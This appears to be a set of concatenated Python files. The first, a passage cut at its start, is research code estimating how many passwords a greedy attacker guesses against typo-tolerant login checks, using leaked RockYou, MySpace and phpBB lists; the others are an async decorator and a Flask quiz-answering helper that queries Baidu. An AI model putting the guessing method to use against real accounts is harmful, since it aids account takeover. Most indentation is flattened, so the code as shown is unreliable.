def compute_guesses_random(fname, q, k=5):
"""
Goal is to compute the fuzzy success rate given query budget of q.
This time instead of considering 500 points in the neighborhood, we took
random 5 of them, and compute guessing success given that new
neighborhood graph.
"""
global proc_name
proc_name = "RANDOM"
M, A, typo_trie, pwm = read_pw_nh_graph(fname)
guess_f = 'guesses/{}_guesses_{}_random_{}.json'.format(pwm.fbasename, q, k)
A = np.zeros(len(typo_trie))
    tM = np.full((M.shape[0], k+1), -1, dtype=int)
for i in xrange(M.shape[0]):
tM[i, 0] = M[i, 0]
if tM[i, 0] == -1:
continue
try:
tM[i, 1:] = np.random.choice(M[i, M[i]>0][1:], k, replace=False)
except ValueError as e:
print("{}: No neighbor for {!r} ({})".format(proc_name, pwm.id2pw(tM[i, 0]), tM[i, 0]))
tM[i, 1:] = np.zeros(k)
p_rpw = pwm.pw2freq(typo_trie.restore_key(M[i, 0]))
A[tM[i, tM[i, :]>=0]] += p_rpw
with open(guess_f, 'w') as f:
json.dump(_comptue_fuzz_success(pwm, tM, A, typo_trie, q), f, indent=4)
def get_trie_key(T, _id):
try:
return T.restore_key(_id)
except KeyError:
return ''
def get_trie_id(T, key):
try:
return T.key_id(unicode(key))
except KeyError:
return -1
proc_name = 'ALL'
def compute_guesses_all(fname, q):
"""We computed neighborhood graph, considering the neighborhood graph
of size 500. Given this neighborhood graph we compute the best set
of guesses in greedy procedure.
"""
M, A, typo_trie, pwm = read_pw_nh_graph(fname)
guess_f = 'guesses/{}_guesses_{}_all.json'.format(pwm.fbasename, q)
with open(guess_f, 'w') as f:
json.dump(_comptue_fuzz_success(pwm, M, A, typo_trie, q), f, indent=4)
def _comptue_fuzz_success(pwm, M, A, typo_trie, q):
"""
pwm: object of type Password (readpw.py)
M: a 2D numpy matrix, containing rpwid|tpwid_1|tpwid_2....
typo_trie: trie of all typos.
    A: of size equal to the size of typo_trie; contains the
       weight of the ball around each typo.
    Computes the best q guesses using a greedy approach.
"""
assert M.shape[0]>2*q, "We don't have enough data to make guesses. "\
"Only {}".format(M.shape[0])
killed = np.ones(M.shape[0], dtype=bool)
guesses = []
i = 0
B = np.zeros(A.shape[0], dtype=int)
print(B.shape, A.shape)
for r in xrange(M.shape[0]):
B[M[r, :]] = r
all_rpw_ent = np.array([
entropy(get_trie_key(typo_trie, c))
for c in M[:,0]
])
while len(guesses)<q:
gi = A.argmax()
# Set of rows where gi exists
r = B[gi]
killed_gi = ((M[:r]==gi).sum(axis=1))>0
## Check for entropy cutoffs
tpw = typo_trie.restore_key(gi)
tpw_ent = entropy(tpw)
if len(tpw)<MIN_PASS_LEN or tpw_ent<MIN_ENTROPY_CUTOFF: # failed
A[gi] = 0
M[:r][M[:r]==gi] = -1
continue
# rpw_ent = (all_rpw_ent[:r] - tpw_ent)<REL_ENT_CUTOFF
failed_entries = (all_rpw_ent[:r]-tpw_ent)<REL_ENT_CUTOFF
print(failed_entries.shape, killed_gi.shape)
if failed_entries[killed_gi].sum()>0:
A[gi] -= sum(
pwm.pw2freq(get_trie_key(typo_trie, c))
for c in M[:r][failed_entries & killed_gi, 0]
)
(M[:r])[M[:r][failed_entries]==gi] = -1
continue
### --
killed[:r][killed_gi] = False
guesses.append((typo_trie.restore_key(gi), A[gi]/float(pwm.totalf())))
for row in M[:r][killed_gi]:
if row[0]>=0:
A[row] -= pwm.pw2freq(get_trie_key(typo_trie, row[0]))
print("({}): {}> {:30s}: {:.3f} (killed={}/{})".format(
proc_name,
len(guesses),
guesses[-1][0],
guesses[-1][1]*100, killed_gi.sum(), M.shape[0]-killed.sum()
))
if (0.99*M.shape[0] > killed.sum()):
M = M[killed]
killed = np.ones(M.shape[0], dtype=bool)
print("({}): New shape of M: {}".format(proc_name, M.shape))
# for i, (g, p) in enumerate(guesses):
# print "{}: {} -> {}".format(i, typo_trie.restore_key(g), p)
print("({}): Total fuzzy success: {}"\
.format(proc_name, 100*sum(g[1] for g in guesses)))
print("({}): Total normal success: {}"\
.format(proc_name, 100*pwm.sumvalues(q)/float(pwm.totalf())))
return guesses
import random
def verify(fname):
pwm = Passwords(fname)
typodir = '{}/typodir'.format(pwd)
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'.format(typodir, pwm.fbasename, 0, N)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'.format(typodir, pwm.fbasename, 0, N)
print tpw_trie_fname, rpw_nh_graph
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname)
M = np.load(rpw_nh_graph)['M']
for i, (pwid, f) in enumerate(pwm):
if random.randint(0, 10000)<=1:
continue
if i>=N: break
rpw = str(pwm.id2pw(pwid).encode('ascii', errors='ignore'))
nh = get_nh(rpw)
assert rpw == typo_trie.restore_key(M[i, 0]), \
"{} <--> {}".format(pwm.id2pw(pwid), typo_trie.restore_key(M[i, 0]))
nh_t = [typo_trie.restore_key(c) for c in M[i] if c>=0]
assert nh == nh_t, ">>> i: {}\nNH-NH_t={}\nNH_t-NH={},\nlen(nh)={}"\
.format(i, set(nh)-set(nh_t), set(nh_t)-set(nh), len(nh))
if (i%100==0):
print "Done {}".format(i)
def run_all(offline=False):
pwleaks = ["/home/ubuntu/passwords/rockyou-withcount.txt.bz2",
"/home/ubuntu/passwords/myspace-withcount.txt.bz2",
"/home/ubuntu/passwords/phpbb-withcount.txt.bz2"][:1]
processes = []
q = Q
for fname in pwleaks:
# processes.append(Process(target=compute_guesses_using_typodist, args=(fname, q, 5, False, offline)))
processes.append(Process(target=compute_guesses_using_typodist, args=(fname, q, CACHE_SIZE, True, offline)))
for p in processes: p.start()
# for p in processes: p.join()
return
if __name__ == '__main__':
import sys
# create_pw_db_(sys.argv[1])
# approx_guesses(sys.argv[1], 1000)
# greedy_maxcoverage_heap(sys.argv[1], 1000)
set_globals(settings_i=0)
run_all()
set_globals(settings_i=1)
run_all()
set_globals(settings_i=2)
run_all(offline=True)
set_globals(settings_i=3)
run_all(offline=True)
# set_globals(settings_i=1)
# fname = sys.argv[1]
# create_pw_nh_graph(fname)
# print("Done creating all the graphs")
# # verify(fname)
# q = Q
# process = {
# 'p_all': Process(target=compute_guesses_all, args=(fname, q)),
# 'p_random': Process(target=compute_guesses_random, args=(fname, q)),
# 'p_typodist': Process(target=compute_guesses_using_typodist, args=(fname, q, 5, False)),
# 'p_topk': Process(target=compute_guesses_using_typodist, args=(fname, q, 5, True))
# }
# process['p_typodist'].start()
# process['p_topk'].start()
# compute_guesses_using_typodist(fname, q, 5, True, offline=True)
# compute_guesses_using_typodist(fname, q, 10, False)
# process['p_typodist'].join()
# process['p_all'].join()
# for pname, proc in process.items():
# print("\n*** {} ***\n".format(pname.upper()))
# proc.start()
# for pname, proc in process.items():
# proc.join()
# pass
|
decorators.py
|
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
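# Example usage (a minimal sketch; `send_notification` is a hypothetical function):
#
#   @async
#   def send_notification(user_id, message):
#       ...  # runs on a background thread
#
#   send_notification(42, "hello")  # returns immediately; the result is discarded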
|
main.py
|
# -*- coding: UTF-8 -*-
import commands
import sys
from flask import Flask, request
import methods
from threading import Thread
import multiprocessing
import operator
import time
from argparse import ArgumentParser
from multiprocessing import Event
from multiprocessing import Pipe
from terminaltables import AsciiTable
from config import enable_chrome
from core.baiduzhidao import baidu_count
from core.check_words import parse_false
from core.chrome_search import run_browser
reload(sys)
sys.setdefaultencoding('utf-8')
app = Flask(__name__)
# @Author : Skye
# @Time : 2018/1/8 20:38
# @desc : Quiz answering assistant; searches Baidu for the answer
def parse_args():
parser = ArgumentParser(description="Million Hero Assistant")
parser.add_argument(
"-t", "--timeout",
type=int,
default=5,
help="default http request timeout"
)
return parser.parse_args()
def parse_question_and_answer(title, answers):
# question = ""
# start = 0
# for i, keyword in enumerate(text_list):
# question += keyword
# if "?" in keyword:
# start = i + 1
# break
real_question = title.split(".")[-1]
question, true_flag = parse_false(real_question)
return true_flag, real_question, question, answers
def pre_process_question(keyword):
"""
strip charactor and strip ?
:param question:
:return:
"""
for char, repl in [("“", ""), ("”", ""), ("?", "")]:
keyword = keyword.replace(char, repl)
keyword = keyword.split(r".")[-1]
keywords = keyword.split(" ")
keyword = "".join([e.strip("\r\n") for e in keywords if e])
return keyword
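# Worked example (illustrative): pre_process_question('3.“Earth Moon”') strips the
# quotation marks, drops the leading "3." prefix, and joins the remaining words
# without spaces, returning 'EarthMoon'.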
def __inner_job(title, answers):
start = time.time()
true_flag, real_question, question, answers = parse_question_and_answer(title, answers)
print('-' * 72)
print(real_question)
print('-' * 72)
print("\n".join(answers))
# notice browser
if enable_chrome:
writer.send(question)
noticer.set()
search_question = pre_process_question(question)
summary = baidu_count(search_question, answers, timeout=timeout)
summary_li = sorted(
summary.items(), key=operator.itemgetter(1), reverse=True)
data = [("选项", "同比")]
for a, w in summary_li:
data.append((a, w))
table = AsciiTable(data)
print(table.table)
print("*" * 72)
if true_flag:
print "肯定回答(**):%s" % summary_li[0][0]
print "否定回答( ):%s " % summary_li[-1][0]
else:
print "肯定回答( ): %s" % summary_li[0][0]
print "否定回答(**): %s" % summary_li[-1][0]
print("*" * 72)
end = time.time()
print("use {0} 秒".format(end - start))
# save_screen(
# directory=data_directory
# )
def run_command(cmd):
status, output = commands.getstatusoutput(cmd)
return status, output
@app.route('/question', methods=['POST'])
def questionAndAnswer():
data = request.json
title = data["title"]
answers = data["answer"]
__inner_job(title, answers)
    m2 = Thread(target=methods.run_algorithm, args=(1, title, answers))
    m3 = Thread(target=methods.run_algorithm, args=(2, title, answers))
m2.start()
m3.start()
return ""
if __name__ == '__main__':
args = parse_args()
timeout = args.timeout
if enable_chrome:
closer = Event()
noticer = Event()
closer.clear()
noticer.clear()
reader, writer = Pipe()
browser_daemon = multiprocessing.Process(
target=run_browser, args=(closer, noticer, reader,))
browser_daemon.daemon = True
browser_daemon.start()
app.run(host="192.168.31.211", port=5000)
if enable_chrome:
reader.close()
writer.close()
closer.set()
time.sleep(3)
|